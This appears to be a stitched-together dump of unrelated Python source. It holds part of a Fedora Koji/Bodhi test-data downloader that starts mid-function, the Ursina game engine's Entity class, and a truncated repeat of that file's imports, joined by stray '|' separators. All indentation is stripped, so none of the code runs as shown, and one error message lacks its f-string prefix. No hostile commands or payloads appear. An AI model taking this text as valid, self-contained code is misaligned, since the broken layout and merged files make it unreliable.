nvr = self.download_build(build_id=c['build_id'], indent=indent)
if btype == 'image':
self.image_packages.add(nvr.rsplit('-', 2)[0])
if btype == 'image':
for m in build['extra']['image']['modules']:
if m in self.module_nvr_short_to_nvr:
self.download_build(nvr=self.module_nvr_short_to_nvr[m], indent=indent)
else:
module_name = m.rsplit('-', 2)[0]
package_id = self.koji_session.getPackageID(module_name)
for module_build in self.koji_session.listBuilds(type='module',
packageID=package_id):
if module_build['nvr'].startswith(m):
self.download_build(nvr=module_build['nvr'], indent=indent + 4)
return nvr
def download_tag_data(self, indent=0):
self.tagged_packages = {}
for tag in ['f28', 'f29']:
exists, output_file = self._check_existing(f'tags/{tag}.json.gz')
if not exists:
show(f'Downloading tag history for {tag}', indent=indent)
result = self.koji_session.queryHistory(tables=['tag_listing'], tag=tag)
filtered_result = [r
for r in result['tag_listing']
if r['name'] in self.image_packages]
d = os.path.dirname(output_file)
if not os.path.exists(d):
os.makedirs(d)
with gzip.open(output_file, 'wt') as f:
json.dump(filtered_result, f, indent=4)
else:
show(f'Using existing tag history for {tag}', indent=indent)
with gzip.open(output_file, 'rt') as f:
filtered_result = json.load(f)
indent += 4
for r in filtered_result:
self.download_build(nvr=f"{r['name']}-{r['version']}-{r['release']}",
indent=indent + 4)
def download_package_details(self, *, indent=0):
for package in sorted(self.image_packages):
self.download_updates('rpm', package, indent=indent)
self.dump_git(os.path.join('rpms', package), indent=indent + 4)
def download_updates(self, content_type, package, *, releases=None, date=DATE, indent=0):
key = f"{content_type}/{package}"
if (key in self.update_info or
(key in self.base_update_info and
self.base_update_info[key]['date'] == date)):
show(f"{key}: already downloaded updates", indent)
if key not in self.update_info:
self.update_info[key] = self.base_update_info[key]
for update in self.update_info[key]['updates']:
src = os.path.join(self.base, 'updates', update + '.json.gz')
dest = os.path.join(self.output, 'updates', update + '.json.gz')
shutil.copy(src, dest)
with gzip.open(src, 'rt') as f:
r = json.load(f)
for b in r['builds']:
build_name = b['nvr'].rsplit('-', 2)[0]
if build_name == package:
self.download_build(nvr=b['nvr'], indent=indent + 4)
return
show(f"{key}: downloading updates", indent)
if releases is None:
if content_type == 'flatpak':
releases = ['F29F']
elif content_type == 'rpm':
releases = ['F28', 'F29']
url = "https://bodhi.fedoraproject.org/updates/"
params = {
'page': 1,
'rows_per_page': 100,
'content_type': content_type,
'packages': package,
'releases': releases,
'submitted_before': date,
}
response = requests.get(url,
headers={'Accept': 'application/json'},
params=params)
response.raise_for_status()
response_json = response.json()
self.update_info[key] = {
'date': date,
'updates': []
}
for r in response_json['updates']:
if ' ' in r['title']:
update_name = r['updateid']
else:
update_name = r['title']
output_file = os.path.join(self.output, 'updates', update_name + '.json.gz')
with gzip.open(output_file, 'wt') as f:
json.dump(r, f, indent=4)
self.update_info[key]['updates'].append(update_name)
if r['status'] in ('pending', 'testing'):
print("Error: {update_name} status is {r['status']}", file=sys.stderr)
sys.exit(1)
for b in r['builds']:
build_name = b['nvr'].rsplit('-', 2)[0]
if build_name == package:
self.download_build(nvr=b['nvr'], indent=indent + 4)
def do_dump_git(self, tempdir, output_file, pkg):
subprocess.check_call(['git', 'clone', '--mirror',
'https://src.fedoraproject.org/' + pkg + '.git'],
cwd=tempdir)
repodir = os.path.join(tempdir, os.path.basename(pkg) + '.git')
result = {}
branches = subprocess.check_output(['git', 'branch', '-a', '--format=%(refname:lstrip=2)'],
cwd=repodir, encoding='UTF-8').strip().split('\n')
for branch in branches:
commits = subprocess.check_output(['git', 'log', '--format=%H', branch],
cwd=repodir, encoding='UTF-8').strip().split('\n')
result[branch] = commits
d = os.path.dirname(output_file)
if not os.path.exists(d):
os.makedirs(d)
with gzip.open(output_file, 'wt') as f:
json.dump(result, f, indent=4)
def dump_git(self, pkg, *, indent=0):
exists, output_file = self._check_existing(f'git/{pkg}.json.gz')
if exists:
show(f"{pkg}.git: already downloaded", indent)
return
show(f"{pkg}.git: downloading", indent)
tempdir = tempfile.mkdtemp()
try:
self.do_dump_git(tempdir, output_file, pkg)
finally:
shutil.rmtree(tempdir)
@click.command()
@click.option('-o', '--output', required=True,
help='Output directory')
@click.option('-b', '--base',
help='Reference directory')
def main(output, base):
"""Download test data"""
downloader = Downloader(output, base)
downloader.create_directories()
downloader.download_updates('flatpak', 'feedreader')
downloader.download_updates('flatpak', 'eog')
downloader.download_updates('flatpak', 'quadrapassel')
downloader.download_build(nvr='eog-master-20180821163756.2')
# These rpm builds are used when testing modification of Bodhi updates
for b in (["aisleriot-3.22.5-1.fc28",
"aisleriot-3.22.6-1.fc29",
"aisleriot-3.22.7-1.fc29",
"bijiben-3.28.1-1.fc28",
"bijiben-3.28.2-1.fc28",
"bijiben-3.30.0-1.fc29",
"bijiben-3.30.1-1.fc29",
"bijiben-3.30.2-1.fc29"]):
downloader.download_build(nvr=b)
# There is a F30 update including gnome-clocks and gnome-weather, use this
# to test multi-Flatpak updates
downloader.download_updates('flatpak', 'gnome-clocks',
releases=['F30F'], date="2019-08-01 00:00:00")
downloader.download_updates('flatpak', 'gnome-weather',
releases=['F30F'], date="2019-08-01 00:00:00")
# A more recent Flatpak with labels
downloader.download_updates('flatpak', 'baobab',
releases=['F32F'], date="2020-08-15 00:00:00")
# Module with multiple contexts
downloader.download_build(nvr='django-1.6-20180828135711.9c690d0e')
downloader.download_build(nvr='django-1.6-20180828135711.a5b0195c')
downloader.download_tag_data()
downloader.download_package_details()
downloader.save_update_info()
if __name__ == '__main__':
main()
|
import sys
import inspect
import importlib
import glob
from pathlib import Path
from panda3d.core import NodePath
from ursina.vec3 import Vec3
from panda3d.core import Vec4, Vec2
from panda3d.core import TransparencyAttrib
from panda3d.core import Shader
from panda3d.core import TextureStage, TexGenAttrib
from ursina.texture import Texture
from panda3d.core import MovieTexture
from panda3d.core import TextureStage
from panda3d.core import CullFaceAttrib
from ursina import application
from ursina.collider import *
from ursina.mesh import Mesh
from ursina.sequence import Sequence, Func, Wait
from ursina.ursinamath import lerp
from ursina import curve
from ursina.curve import CubicBezier
from ursina.mesh_importer import load_model
from ursina.texture_importer import load_texture
from ursina.string_utilities import camel_to_snake
from textwrap import dedent
from ursina.light import *
from ursina import color
try:
from ursina import scene
except:
pass
class Entity(NodePath):
rotation_directions = (-1,-1,1)
def __init__(self, add_to_scene_entities=True, **kwargs):
super().__init__(self.__class__.__name__)
self.name = camel_to_snake(self.type)
self.enabled = True # disabled entities wil not be visible nor run code
self.visible = True
self.ignore = False # if True, will not try to run code
self.eternal = False # eternal entities does not get destroyed on scene.clear()
self.ignore_paused = False
self.ignore_input = False
self.parent = scene
self.add_to_scene_entities = add_to_scene_entities # set to False to be ignored by the engine, but still get rendered.
if add_to_scene_entities:
scene.entities.append(self)
self.model = None # set model with model='model_name' (without file type extention)
self.color = color.white
self.texture = None # set model with texture='texture_name'. requires a model to be set beforehand.
self.reflection_map = scene.reflection_map
self.reflectivity = 0
self.render_queue = 0
self.double_sided = False
# self.always_on_top = False
self.collision = False # toggle collision without changing collider.
self.collider = None # set to 'box'/'sphere'/'mesh' for auto fitted collider.
self.scripts = list() # add with add_script(class_instance). will assign an 'entity' variable to the script.
self.animations = list()
self.hovered = False # will return True if mouse hovers entity.
self.origin = Vec3(0,0,0)
self.position = Vec3(0,0,0) # right, up, forward. can also set self.x, self.y, self.z
self.rotation = Vec3(0,0,0) # can also set self.rotation_x, self.rotation_y, self.rotation_z
self.scale = Vec3(1,1,1) # can also set self.scale_x, self.scale_y, self.scale_z
self.line_definition = None # returns a Traceback(filename, lineno, function, code_context, index).
if application.trace_entity_definition and add_to_scene_entities:
from inspect import getframeinfo, stack
_stack = stack()
caller = getframeinfo(_stack[1][0])
if len(_stack) > 2 and _stack[1].code_context and 'super().__init__()' in _stack[1].code_context[0]:
caller = getframeinfo(_stack[2][0])
self.line_definition = caller
if caller.code_context:
self.code_context = caller.code_context[0]
if (self.code_context.count('(') == self.code_context.count(')') and
' = ' in self.code_context and not 'name=' in self.code_context
and not 'Ursina()' in self.code_context):
self.name = self.code_context.split(' = ')[0].strip().replace('self.', '')
# print('set name to:', self.code_context.split(' = ')[0].strip().replace('self.', ''))
if application.print_entity_definition:
print(f'{Path(caller.filename).name} -> {caller.lineno} -> {caller.code_context}')
for key, value in kwargs.items():
setattr(self, key, value)
# if any lights defined, then apply them to this entity (otherwise use default lighting)
for light in scene.lights:
self.setLight(light.node)
def _list_to_vec(self, value):
if isinstance(value, (int, float, complex)):
return Vec3(value, value, value)
if len(value) % 2 == 0:
new_value = Vec2()
for i in range(0, len(value), 2):
new_value.add_x(value[i])
new_value.add_y(value[i+1])
if len(value) % 3 == 0:
new_value = Vec3()
for i in range(0, len(value), 3):
new_value.add_x(value[i])
new_value.add_y(value[i+1])
new_value.add_z(value[i+2])
return new_value
def enable(self):
self.enabled = True
def disable(self):
self.enabled = False
def __setattr__(self, name, value):
if name == 'enabled':
try:
# try calling on_enable() on classes inheriting from Entity
if value == True:
self.on_enable()
else:
self.on_disable()
except:
pass
if value == True:
if not self.is_singleton():
self.unstash()
else:
if not self.is_singleton():
self.stash()
if name == 'eternal':
for c in self.children:
c.eternal = value
if name == 'world_parent':
self.reparent_to(value)
if name == 'model':
if value is None:
if hasattr(self, 'model') and self.model:
self.model.removeNode()
# print('removed model')
object.__setattr__(self, name, value)
return None
if isinstance(value, NodePath): # pass procedural model
if self.model is not None and value != self.model:
self.model.removeNode()
object.__setattr__(self, name, value)
elif isinstance(value, str): # pass model asset name
m = load_model(value, application.asset_folder)
if not m:
m = load_model(value, application.internal_models_compressed_folder)
if m:
if self.model is not None:
self.model.removeNode()
object.__setattr__(self, name, m)
if isinstance(m, Mesh):
m.recipe = value
# print('loaded model successively')
else:
# if '.' in value:
# print(f'''trying to load model with specific filename extention. please omit it. '{value}' -> '{value.split('.')[0]}' ''')
print('missing model:', value)
return
if self.model:
self.model.reparentTo(self)
self.model.setTransparency(TransparencyAttrib.M_dual)
self.color = self.color # reapply color after changing model
self.texture = self.texture # reapply texture after changing model
self._vert_cache = None
if isinstance(value, Mesh):
if hasattr(value, 'on_assign'):
value.on_assign(assigned_to=self)
return
if name == 'color' and value is not None:
if isinstance(value, str):
value = color.hex(value)
if not isinstance(value, Vec4):
value = Vec4(value[0], value[1], value[2], value[3])
if self.model:
self.model.setColorScaleOff() # prevent inheriting color from parent
self.model.setColorScale(value)
object.__setattr__(self, name, value)
if name == 'collision' and hasattr(self, 'collider') and self.collider:
if value:
self.collider.node_path.unstash()
else:
self.collider.node_path.stash()
object.__setattr__(self, name, value)
return
if name == 'render_queue':
if self.model:
self.model.setBin('fixed', value)
if name == 'double_sided':
self.setTwoSided(value)
try:
super().__setattr__(name, value)
except:
pass
# print('failed to set attribiute:', name)
@property
def parent(self):
try:
return self._parent
except:
return None
@parent.setter
def parent(self, value):
self._parent = value
if value is None:
destroy(self)
else:
try:
self.reparentTo(value)
except:
print('invalid parent:', value)
@property
def type(self):
return self.__class__.__name__
@property
def types(self):
return [c.__name__ for c in inspect.getmro(self.__class__)]
@property
def visible(self):
return self._visible
@visible.setter
def visible(self, value):
self._visible = value
if value:
self.show()
else:
self.hide()
@property
def collider(self):
return self._collider
@collider.setter
def collider(self, value):
# destroy existing collider
if value and hasattr(self, 'collider') and self._collider:
self._collider.remove()
self._collider = value
if value == 'box':
if self.model:
self._collider = BoxCollider(entity=self, center=-self.origin, size=self.model_bounds)
else:
self._collider = BoxCollider(entity=self)
self._collider.name = value
elif value == 'sphere':
self._collider = SphereCollider(entity=self)
self._collider.name = value
elif value == 'mesh' and self.model:
self._collider = MeshCollider(entity=self, mesh=self.model, center=-self.origin)
self._collider.name = value
elif isinstance(value, Mesh):
self._collider = MeshCollider(entity=self, mesh=value, center=-self.origin)
self.collision = bool(self.collider)
return
@property
def origin(self):
return self._origin
@origin.setter
def origin(self, value):
if not self.model:
self._origin = Vec3(0,0,0)
return
if not isinstance(value, (Vec2, Vec3)):
value = self._list_to_vec(value)
if isinstance(value, Vec2):
value = Vec3(*value, self.origin_z)
self._origin = value
self.model.setPos(-value[0], -value[1], -value[2])
@property
def origin_x(self):
return self.origin[0]
@origin_x.setter
def origin_x(self, value):
self.origin = (value, self.origin_y, self.origin_z)
@property
def origin_y(self):
return self.origin[1]
@origin_y.setter
def origin_y(self, value):
self.origin = (self.origin_x, value, self.origin_z)
@property
def origin_z(self):
return self.origin[2]
@origin_z.setter
def origin_z(self, value):
self.origin = (self.origin_x, self.origin_y, value)
@property
def world_position(self):
return Vec3(self.get_position(render))
@world_position.setter
def world_position(self, value):
if not isinstance(value, (Vec2, Vec3)):
value = self._list_to_vec(value)
if isinstance(value, Vec2):
value = Vec3(*value, self.z)
self.setPos(render, Vec3(value[0], value[1], value[2]))
@property
def world_x(self):
return self.getX(render)
@property
def world_y(self):
return self.getY(render)
@property
def world_z(self):
return self.getZ(render)
@world_x.setter
def world_x(self, value):
self.setX(render, value)
@world_y.setter
def world_y(self, value):
self.setY(render, value)
@world_z.setter
def world_z(self, value):
self.setZ(render, value)
@property
def position(self):
return Vec3(*self.getPos())
@position.setter
def position(self, value):
if not isinstance(value, (Vec2, Vec3)):
value = self._list_to_vec(value)
if isinstance(value, Vec2):
value = Vec3(*value, self.z)
self.setPos(value[0], value[1], value[2])
@property
def x(self):
return self.getX()
@x.setter
def x(self, value):
self.setX(value)
@property
def y(self):
return self.getY()
@y.setter
def y(self, value):
self.setY(value)
@property
def z(self):
return self.getZ()
@z.setter
def z(self, value):
self.setZ(value)
@property
def world_rotation(self):
rotation = self.getHpr(base.render)
return Vec3(rotation[1], rotation[0], rotation[2]) * Entity.rotation_directions
@world_rotation.setter
def world_rotation(self, value):
rotation = self.setHpr(Vec3(value[1], value[0], value[2]) * Entity.rotation_directions, base.render)
@property
def world_rotation_x(self):
return self.world_rotation[0]
@world_rotation_x.setter
def world_rotation_x(self, value):
self.world_rotation = Vec3(value, self.world_rotation[1], self.world_rotation[2])
@property
def world_rotation_y(self):
return self.world_rotation[1]
@world_rotation_y.setter
def world_rotation_y(self, value):
self.world_rotation = Vec3(self.world_rotation[0], value, self.world_rotation[2])
@property
def world_rotation_z(self):
return self.world_rotation[2]
@world_rotation_z.setter
def world_rotation_z(self, value):
self.world_rotation = Vec3(self.world_rotation[0], self.world_rotation[1], value)
@property
def rotation(self):
rotation = self.getHpr()
return Vec3(rotation[1], rotation[0], rotation[2]) * Entity.rotation_directions
@rotation.setter
def rotation(self, value):
if not isinstance(value, (Vec2, Vec3)):
value = self._list_to_vec(value)
if isinstance(value, Vec2):
value = Vec3(*value, self.rotation_z)
self.setHpr(Vec3(value[1], value[0], value[2]) * Entity.rotation_directions)
@property
def rotation_x(self):
return self.rotation.x
@rotation_x.setter
def rotation_x(self, value):
self.rotation = Vec3(value, self.rotation[1], self.rotation[2])
@property
def rotation_y(self):
return self.rotation.y
@rotation_y.setter
def rotation_y(self, value):
self.rotation = Vec3(self.rotation[0], value, self.rotation[2])
@property
def rotation_z(self):
return self.rotation.z
@rotation_z.setter
def rotation_z(self, value):
self.rotation = Vec3(self.rotation[0], self.rotation[1], value)
@property
def world_scale(self):
return Vec3(*self.getScale(base.render))
@world_scale.setter
def world_scale(self, value):
if isinstance(value, (int, float, complex)):
value = Vec3(value, value, value)
self.setScale(base.render, value)
@property
def world_scale_x(self):
return self.getScale(base.render)[0]
@world_scale_x.setter
def world_scale_x(self, value):
self.setScale(base.render, Vec3(value, self.world_scale_y, self.world_scale_z))
@property
def world_scale_y(self):
return self.getScale(base.render)[1]
@world_scale_y.setter
def world_scale_y(self, value):
self.setScale(base.render, Vec3(self.world_scale_x, value, self.world_scale_z))
@property
def world_scale_z(self):
return self.getScale(base.render)[2]
@world_scale_z.setter
def world_scale_z(self, value):
self.setScale(base.render, Vec3(self.world_scale_x, value, self.world_scale_z))
@property
def scale(self):
scale = self.getScale()
return Vec3(scale[0], scale[1], scale[2])
@scale.setter
def scale(self, value):
if not isinstance(value, (Vec2, Vec3)):
value = self._list_to_vec(value)
if isinstance(value, Vec2):
value = Vec3(*value, self.scale_z)
value = [e if e!=0 else .001 for e in value]
self.setScale(value[0], value[1], value[2])
@property
def scale_x(self):
return self.scale[0]
@scale_x.setter
def scale_x(self, value):
self.setScale(value, self.scale_y, self.scale_z)
@property
def scale_y(self):
return self.scale[1]
@scale_y.setter
def scale_y(self, value):
self.setScale(self.scale_x, value, self.scale_z)
@property
def scale_z(self):
return self.scale[2]
@scale_z.setter
def scale_z(self, value):
self.setScale(self.scale_x, self.scale_y, value)
@property
def forward(self):
return render.getRelativeVector(self, (0, 0, 1))
@property
def back(self):
return -self.forward
@property
def right(self):
return render.getRelativeVector(self, (1, 0, 0))
@property
def left(self):
return -self.right
@property
def up(self):
return render.getRelativeVector(self, (0, 1, 0))
@property
def down(self):
return -self.up
@property
def screen_position(self):
from ursina import camera
p3 = camera.getRelativePoint(self, Vec3.zero())
full = camera.lens.getProjectionMat().xform(Vec4(*p3, 1))
recip_full3 = 1 / full[3]
p2 = Vec3(full[0], full[1], full[2]) * recip_full3
screen_pos = Vec3(p2[0]*camera.aspect_ratio/2, p2[1]/2, 0)
return screen_pos
@property
def shader(self):
return self._shader
@shader.setter
def shader(self, value):
self._shader = value
if value is None:
self.setShaderAuto()
return
if not hasattr(value, '_shader'):
self.setShader(value)
else:
self.setShader(value._shader)
if value:
value.entity = self
for key, value in value.default_input.items():
self.set_shader_input(key, value)
# try:
# self.setShader(Shader.load(f'{value}.sha', Shader.SL_Cg))
# except:
# self.setShader(Shader.load(Shader.SL_GLSL, vertex=f'{value}.vert', fragment=f'{value}.frag'))
def set_shader_input(self, name, value):
if isinstance(value, Texture):
value = value._texture # make sure to send the panda3d texture to the shader
super().set_shader_input(name, value)
@property
def texture(self):
if not hasattr(self, '_texture'):
return None
return self._texture
@texture.setter
def texture(self, value):
if value is None and self._texture:
# print('remove texture')
self._texture = None
self.setTextureOff(True)
return
if value.__class__ is Texture:
texture = value
elif isinstance(value, str):
texture = load_texture(value)
# print('loaded texture:', texture)
if texture is None:
print('no texture:', value)
return
if texture.__class__ is MovieTexture:
self._texture = texture
self.setTexture(texture)
return
self._texture = texture
if self.model:
self.model.setTexture(texture._texture, 1)
@property
def texture_scale(self):
return self._texture_scale
@texture_scale.setter
def texture_scale(self, value):
self._texture_scale = value
if self.model and self.texture:
self.model.setTexScale(TextureStage.getDefault(), value[0], value[1])
@property
def texture_offset(self):
return self._texture_offset
@texture_offset.setter
def texture_offset(self, value):
if self.model and self.texture:
self.model.setTexOffset(TextureStage.getDefault(), value[0], value[1])
self.texture = self.texture
self._texture_offset = value
@property
def alpha(self):
return self.color[3]
@alpha.setter
def alpha(self, value):
if value > 1:
value = value / 255
self.color = (self.color.h, self.color.s, self.color.v, value)
@property
def always_on_top(self):
return self._always_on_top
@always_on_top.setter
def always_on_top(self, value):
self._always_on_top = value
self.set_bin("fixed", 0)
self.set_depth_write(not value)
self.set_depth_test(not value)
@property
def reflection_map(self):
return self._reflection_map
@reflection_map.setter
def reflection_map(self, value):
if value.__class__ is Texture:
texture = value
elif isinstance(value, str):
texture = load_texture(value)
self._reflection_map = texture
@property
def reflectivity(self):
return self._reflectivity
@reflectivity.setter
def reflectivity(self, value):
self._reflectivity = value
if value == 0:
self.texture = None
if value > 0:
# if self.reflection_map == None:
# self.reflection_map = scene.reflection_map
#
# if not self.reflection_map:
# print('error setting reflectivity. no reflection map')
# return
if not self.normals:
self.model.generate_normals()
# ts = TextureStage('env')
# ts.setMode(TextureStage.MAdd)
# self.model.setTexGen(ts, TexGenAttrib.MEyeSphereMap)
# print('---------------set reflectivity', self.reflection_map)
# self.model.setTexture(ts, self.reflection_map)
self.texture = self._reflection_map
# print('set reflectivity')
def generate_sphere_map(self, size=512, name=f'sphere_map_{len(scene.entities)}'):
from ursina import camera
_name = 'textures/' + name + '.jpg'
org_pos = camera.position
camera.position = self.position
base.saveSphereMap(_name, size=size)
camera.position = org_pos
print('saved sphere map:', name)
self.model.setTexGen(TextureStage.getDefault(), TexGenAttrib.MEyeSphereMap)
self.reflection_map = name
def generate_cube_map(self, size=512, name=f'cube_map_{len(scene.entities)}'):
from ursina import camera
_name = 'textures/' + name
org_pos = camera.position
camera.position = self.position
base.saveCubeMap(_name+'.jpg', size=size)
camera.position = org_pos
print('saved cube map:', name + '.jpg')
self.model.setTexGen(TextureStage.getDefault(), TexGenAttrib.MWorldCubeMap)
self.reflection_map = _name + '#.jpg'
self.model.setTexture(loader.loadCubeMap(_name + '#.jpg'), 1)
@property
def model_bounds(self):
if self.model:
bounds = self.model.getTightBounds()
bounds = Vec3(
Vec3(bounds[1][0], bounds[1][1], bounds[1][2]) # max point
- Vec3(bounds[0][0], bounds[0][1], bounds[0][2]) # min point
)
return bounds
return (0,0,0)
@property
def bounds(self):
return Vec3(
self.model_bounds[0] * self.scale_x,
self.model_bounds[1] * self.scale_y,
self.model_bounds[2] * self.scale_z
)
def reparent_to(self, entity):
if entity is not None:
self.wrtReparentTo(entity)
self._parent = entity
def get_position(self, relative_to=scene):
return self.getPos(relative_to)
def set_position(self, value, relative_to=scene):
self.setPos(relative_to, Vec3(value[0], value[1], value[2]))
def add_script(self, class_instance):
if isinstance(class_instance, object) and type(class_instance) is not str:
class_instance.entity = self
class_instance.enabled = True
setattr(self, camel_to_snake(class_instance.__class__.__name__), class_instance)
self.scripts.append(class_instance)
# print('added script:', camel_to_snake(name.__class__.__name__))
return class_instance
def combine(self, analyze=False, auto_destroy=True):
from ursina.scripts.combine import combine
self.model = combine(self, analyze, auto_destroy)
return self.model
def flip_faces(self):
if not hasattr(self, '_vertex_order'):
self._vertex_order = True
self._vertex_order = not self._vertex_order
if self._vertex_order:
self.setAttrib(CullFaceAttrib.make(CullFaceAttrib.MCullClockwise))
else:
self.setAttrib(CullFaceAttrib.make(CullFaceAttrib.MCullCounterClockwise))
def look_at(self, target, axis='forward'):
from panda3d.core import Quat
if not isinstance(target, Entity):
target = Vec3(*target)
self.lookAt(target)
if axis == 'forward':
return
rotation_offset = {
'back' : Quat(0,0,1,0),
'down' : Quat(-.707,.707,0,0),
'up' : Quat(-.707,-.707,0,0),
'right' : Quat(-.707,0,.707,0),
'left' : Quat(-.707,0,-.707,0),
}[axis]
self.setQuat(rotation_offset * self.getQuat())
def look_at_2d(self, target, axis='z'):
from math import degrees, atan2
if isinstance(target, Entity):
target = Vec3(target.world_position)
pos = target - self.world_position
if axis == 'z':
self.rotation_z = degrees(atan2(pos[0], pos[1]))
def has_ancestor(self, possible_ancestor):
p = self
if isinstance(possible_ancestor, Entity):
# print('ENTITY')
for i in range(100):
if p.parent:
if p.parent == possible_ancestor:
return True
p = p.parent
if isinstance(possible_ancestor, list) or isinstance(possible_ancestor, tuple):
# print('LIST OR TUPLE')
for e in possible_ancestor:
for i in range(100):
if p.parent:
if p.parent == e:
return True
break
p = p.parent
elif isinstance(possible_ancestor, str):
print('CLASS NAME', possible_ancestor)
for i in range(100):
if p.parent:
if p.parent.__class__.__name__ == possible_ancestor:
return True
break
p = p.parent
return False
@property
def children(self):
return [e for e in scene.entities if e.parent == self]
@property
def attributes(self):
return ('name', 'enabled', 'eternal', 'visible', 'parent',
'origin', 'position', 'rotation', 'scale',
'model', 'color', 'texture', 'texture_scale', 'texture_offset',
# 'world_position', 'world_x', 'world_y', 'world_z',
# 'world_rotation', 'world_rotation_x', 'world_rotation_y', 'world_rotation_z',
# 'world_scale', 'world_scale_x', 'world_scale_y', 'world_scale_z',
# 'x', 'y', 'z',
# 'origin_x', 'origin_y', 'origin_z',
# 'rotation_x', 'rotation_y', 'rotation_z',
# 'scale_x', 'scale_y', 'scale_z',
'render_queue', 'always_on_top', 'collision', 'collider', 'scripts')
#------------
# ANIMATIONS
#------------
def animate(self, name, value, duration=.1, delay=0, curve=curve.in_expo, loop=False, resolution=None, interrupt=True, time_step=None, auto_destroy=True):
s = Sequence(
Wait(delay),
Func(self._animate, name, value, duration, curve, loop, resolution, interrupt, time_step, auto_destroy)
)
s.start()
return s
def _animate(self, name, value, duration=.1, curve=curve.in_expo, loop=False, resolution=None, interrupt=True, time_step=None, auto_destroy=True):
animator_name = name + '_animator'
# print('start animating value:', name, animator_name )
if interrupt and hasattr(self, animator_name):
getattr(self, animator_name).pause()
# print('interrupt', animator_name)
else:
try:
getattr(self, animator_name).finish()
except:
pass
setattr(self, animator_name, Sequence(loop=loop, time_step=time_step, auto_destroy=auto_destroy))
sequence = getattr(self, animator_name)
self.animations.append(sequence)
# sequence.append(Wait(delay))
if not resolution:
resolution = max(int(duration * 60), 1)
for i in range(resolution+1):
t = i / resolution
# if isinstance(curve, CubicBezier):
# t = curve.calculate(t)
# else:
t = curve(t)
sequence.append(Wait(duration / resolution))
sequence.append(Func(setattr, self, name, lerp(getattr(self, name), value, t)))
sequence.start()
return sequence
def animate_position(self, value, duration=.1, **kwargs):
x = self.animate('x', value[0], duration, **kwargs)
y = self.animate('y', value[1], duration, **kwargs)
z = None
if len(value) > 2:
z = self.animate('z', value[2], duration, **kwargs)
return x, y, z
def animate_rotation(self, value, duration=.1, **kwargs):
x = self.animate('rotation_x', value[0], duration, **kwargs)
y = self.animate('rotation_y', value[1], duration, **kwargs)
z = self.animate('rotation_z', value[2], duration, **kwargs)
return x, y, z
def animate_scale(self, value, duration=.1, **kwargs):
if isinstance(value, (int, float, complex)):
value = Vec3(value, value, value)
return self.animate('scale', value, duration, **kwargs)
# generate animation functions
for e in ('x', 'y', 'z', 'rotation_x', 'rotation_y', 'rotation_z', 'scale_x', 'scale_y', 'scale_z'):
exec(dedent(f'''
def animate_{e}(self, value, duration=.1, delay=0, **kwargs):
return self.animate('{e}', value, duration=duration, delay=delay, **kwargs)
'''))
def shake(self, duration=.2, magnitude=1, speed=.05, direction=(1,1)):
import random
s = Sequence()
original_position = self.position
for i in range(int(duration / speed)):
s.append(Func(self.set_position,
Vec3(
original_position[0] + (random.uniform(-.1, .1) * magnitude * direction[0]),
original_position[1] + (random.uniform(-.1, .1) * magnitude * direction[1]),
original_position[2],
)))
s.append(Wait(speed))
s.append(Func(self.set_position, original_position))
s.start()
return s
def animate_color(self, value, duration=.1, **kwargs):
return self.animate('color', value, duration, **kwargs)
def fade_out(self, value=0, duration=.5, **kwargs):
return self.animate('color', Vec4(self.color[0], self.color[1], self.color[2], value), duration, **kwargs)
def fade_in(self, value=1, duration=.5, **kwargs):
return self.animate('color', Vec4(self.color[0], self.color[1], self.color[2], value), duration, **kwargs)
def blink(self, value=color.clear, duration=.1, delay=0, curve=curve.in_expo_boomerang, **kwargs):
return self.animate_color(value, duration=duration, delay=delay, curve=curve, **kwargs)
def intersects(self, traverse_target=scene, ignore=(), debug=False):
if not self.collision or not self.collider:
return False
from ursina.hit_info import HitInfo
from ursina import distance
if not hasattr(self, '_picker'):
from panda3d.core import CollisionTraverser, CollisionNode, CollisionHandlerQueue
from panda3d.core import CollisionRay, CollisionSegment, CollisionBox
self._picker = CollisionTraverser() # Make a traverser
self._pq = CollisionHandlerQueue() # Make a handler
self._pickerNode = CollisionNode('raycaster')
self._pickerNode.set_into_collide_mask(0)
self._pickerNP = self.attach_new_node(self._pickerNode)
self._picker.addCollider(self._pickerNP, self._pq)
self._pickerNP.show()
self._pickerNode.addSolid(self._collider.shape)
if debug:
self._pickerNP.show()
else:
self._pickerNP.hide()
self._picker.traverse(traverse_target)
if self._pq.get_num_entries() == 0:
self.hit = HitInfo(hit=False)
return self.hit
ignore = (self,)
ignore += tuple([e for e in scene.entities if not e.collision])
self._pq.sort_entries()
self.entries = [ # filter out ignored entities
e for e in self._pq.getEntries()
if e.get_into_node_path().parent not in ignore
]
if len(self.entries) == 0:
self.hit = HitInfo(hit=False)
return self.hit
collision = self.entries[0]
nP = collision.get_into_node_path().parent
point = collision.get_surface_point(nP)
point = Vec3(*point)
world_point = collision.get_surface_point(render)
world_point = Vec3(*world_point)
hit_dist = distance(self.world_position, world_point)
if nP.name.endswith('.egg'):
nP = nP.parent
self.hit = HitInfo(hit=True)
for e in scene.entities:
if e == nP:
self.hit.entity = e
self.hit.point = point
self.hit.world_point = world_point
self.hit.distance = hit_dist
normal = collision.get_surface_normal(collision.get_into_node_path().parent)
self.hit.normal = Vec3(*normal)
normal = collision.get_surface_normal(render)
self.hit.world_normal = Vec3(*normal)
return self.hit
self.hit = HitInfo(hit=False)
return self.hit
if __name__ == '__main__':
from ursina import *
app = main.Ursina()
e = Entity(model='quad', color=color.orange, position=(0,0,1), scale=1.5, rotation=(0,0,45), texture='brick')
'''example of inheriting Entity'''
class Player(Entity):
def __init__(self, **kwargs):
super().__init__()
self.model='cube'
self.color = color.red
self.scale_y = 2
for key, value in kwargs.items():
setattr(self, key, value)
# input and update functions gets automatically called by the engine
def input(self, key):
if key == 'space':
# self.color = self.color.inverse()
self.animate_x(2, duration=1)
def update(self):
self.x += held_keys['d'] * time.dt * 10
self.x -= held_keys['a'] * time.dt * 10
player = Player(x=-1)
# test
e = Entity(model='cube')
# e.animate_x(3, duration=2, delay=.5, loop=True)
# e.animate_position(Vec3(1,1,1), duration=1, loop=True)
# e.animate_rotation(Vec3(45,45,45))
# e.animate_scale(2, duration=1, curve=curve.out_expo_boomerang, loop=True)
# e.animate_color(color.green, loop=True)
# e.shake()
# e.fade_out(delay=.5)
# e.fade_in(delay=2.5)
e.blink(color.red, duration=1, curve=curve.linear_boomerang, loop=True)
app.run()
| import sys
import inspect
import importlib
import glob
from pathlib import Path
from panda3d.core import NodePath
from ursina.vec3 import Vec3
from panda3d.core import Vec4, Vec2
from panda3d.core import TransparencyAttrib
from panda3d.core import Shader
from panda3d.core import TextureStage, TexGenAttrib
from ursina.texture import Texture
from panda3d.core import MovieTexture
from panda3d.core import TextureStage
